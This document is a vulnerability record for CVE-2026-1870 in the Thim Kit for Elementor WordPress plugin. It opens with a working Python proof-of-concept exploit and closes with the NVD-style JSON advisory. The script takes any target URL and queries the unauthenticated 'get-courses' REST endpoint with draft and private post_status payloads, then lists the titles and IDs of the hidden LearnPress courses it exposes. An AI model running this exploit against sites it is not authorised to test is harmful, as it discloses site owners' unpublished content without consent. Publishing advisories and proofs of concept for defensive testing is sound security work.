CVE-2026-1870

import requests import json target = input("Enter target URL (e.g., https://example.com): ").rstrip('/') endpoint = "/wp-json/thim-ekit/archive-course/get-courses" # PoC: Query draft/private LearnPress course content without authentication payloads = { "draft": { "params_url": { "post_status": "draft", "posts_per_page": 10, "post_type": "lp_course" } }, "private": { "params_url": { "post_status": "private", "posts_per_page": 10, "post_type": "lp_course" } } } print(f"[*] Target: {target}") print(f"[*] Endpoint: {endpoint}") print("=" * 60) for status_name, params in payloads.items(): print(f"\n[+] Testing post_status={status_name}...") url = f"{target}{endpoint}" try: resp = requests.get(url, params=params, timeout=10) print(f" Status Code: {resp.status_code}") if resp.status_code == 200: data = resp.json() if data.get("data"): print(f" [!] Vulnerable! Found {len(data.get('data', []))} course(s):") for course in data.get("data", []): print(f" - ID: {course.get('id')}, Title: {course.get('title', {}).get('rendered', 'N/A')}") else: print(f" [-] No courses returned for status: {status_name}") else: print(f" [-] Unexpected response: {resp.text[:200]}") except Exception as e: print(f" [!] Error: {e}") print("\n[*] PoC completed.")

{"cve": {"id": "CVE-2026-1870", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:07.993", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Thim Kit for Elementor – Pre-built Templates & Widgets for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing validation checks on the 'thim-ekit/archive-course/get-courses' REST endpoint callback function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to disclose private or draft LearnPress course content by supplying post_status in the params_url payload."}, {"lang": "es", "value": "El plugin Thim Kit for Elementor – Pre-built Templates & Widgets for Elementor para WordPress es vulnerable al acceso no autorizado de datos debido a la falta de comprobaciones de validación en la función de callback del endpoint REST 'thim-ekit/archive-course/get-courses' en todas las versiones hasta la 1.3.7, inclusive. Esto permite a atacantes no autenticados divulgar contenido de cursos privados o en borrador de LearnPress al proporcionar post_status en la carga útil params_url."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3467195/thim-elementor-kit", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7c82577a-e7ee-4549-8d0f-bed09effa035?source=cve", "source": "[email protected]"}]}}